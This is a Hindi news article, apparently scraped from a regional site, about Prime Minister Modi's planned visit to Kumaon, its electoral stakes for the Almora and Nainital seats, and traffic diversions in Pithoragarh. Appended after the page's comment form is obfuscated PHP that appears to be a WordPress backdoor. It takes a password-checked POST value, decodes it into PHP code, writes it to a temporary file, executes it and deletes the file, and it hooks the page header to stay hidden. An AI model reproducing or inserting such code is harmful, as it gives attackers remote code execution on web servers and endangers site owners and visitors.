कुमाऊं में नैनीताल, अल्मोड़ा सीट पर जीत का रास्ता बनाएगा पीएम मोदी का दौरा, भाजपा साध रही एक साथ कई समीकर

Uttarakhand Press 7 October 2023: प्रधानमंत्री नरेंद्र मोदी का 12 अक्टूबर को कुमाऊं के अल्मोड़ा संसदीय क्षेत्र के जागेश्वर, पिथौरागढ़ व लोहाघाट का दौरा सामरिक के साथ ही सियासी नजरिये से भी बेहद महत्वपूर्ण है। प्रधानमंत्री ने महिला आरक्षण बिल संसद में पारित कराने के बाद पार्टी को चुनावी मोड में ला दिया है। कुमाऊं में पिछली बार के आम चुनाव में मोदी लहर में अल्मोड़ा व नैनीताल सीट पर भाजपा प्रत्याशियों ने बंपर जीत दर्ज की थी, लेकिन अब दोनों सीटों पर सांसदों को लेकर पार्टी कार्यकर्ताओं के साथ ही जनता में नाराजगी है।

मोदी के आगमन पर बदली नजर आएगी यातायात व्यवस्था:
प्रधानमंत्री नरेन्द्र मोदी के 12 अक्टूबर के दौरे को लेकर पिथौरागढ़ नगर में यातायात व्यवस्था बदली नजर आएगी। पिथौरागढ़ पुलिस द्वारा यातायात व्यवस्था तय कर दी गई है। शहर में आने वाले वाहनों के ड्राप प्वाइंट अपटेक तिराहा और देव सिंह मैदान होंगे। कार्यक्रम को लेकर खाकर से आने वाले वाहन तिराहे से जाजरदेवल को डायवर्ट होंगे। बीच की आबादी से आने वाले वाहन पुलिस चौकी नैनी सैनी के पास ग्रिफ की खाली भूमि पर पार्क होंगे।

धारचूला रोड से आने वाले वाहन संग्रहालय होते नहीं आएंगे। सभी वाहन रई, सिल्थाम वाया घंटाकरण्, चिमिस्या नौला, अपटेक तिराहा, जीआइसी होते हुए डिग्री कालेज मैदान में पार्क होंगे। झूलाघाट रोड से आने वाले वाहन जाखनी, तिलढुकरी, वड्डा तिराहे से देव सिंह मैदान तक आएंगे और यात्रियों को उतार कर वहीं पर पार्क होंगे। वीवीआइपी के आने से एक घंटे पहले तक कार्यवाही चलेगी।

Read Previous

पहले शराब पिलाई फिर चाकू से किए ताबड़तोड़ वार, हत्या कर शव नहर में फेंका, जानें मामला

Read Next

Nainital Accident: नैनीताल में हरियाणा के पर्यटकों की बस 200 मीटर गहरी खाई में गिरी, सात की मौत, बचाव अभियान जारी

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}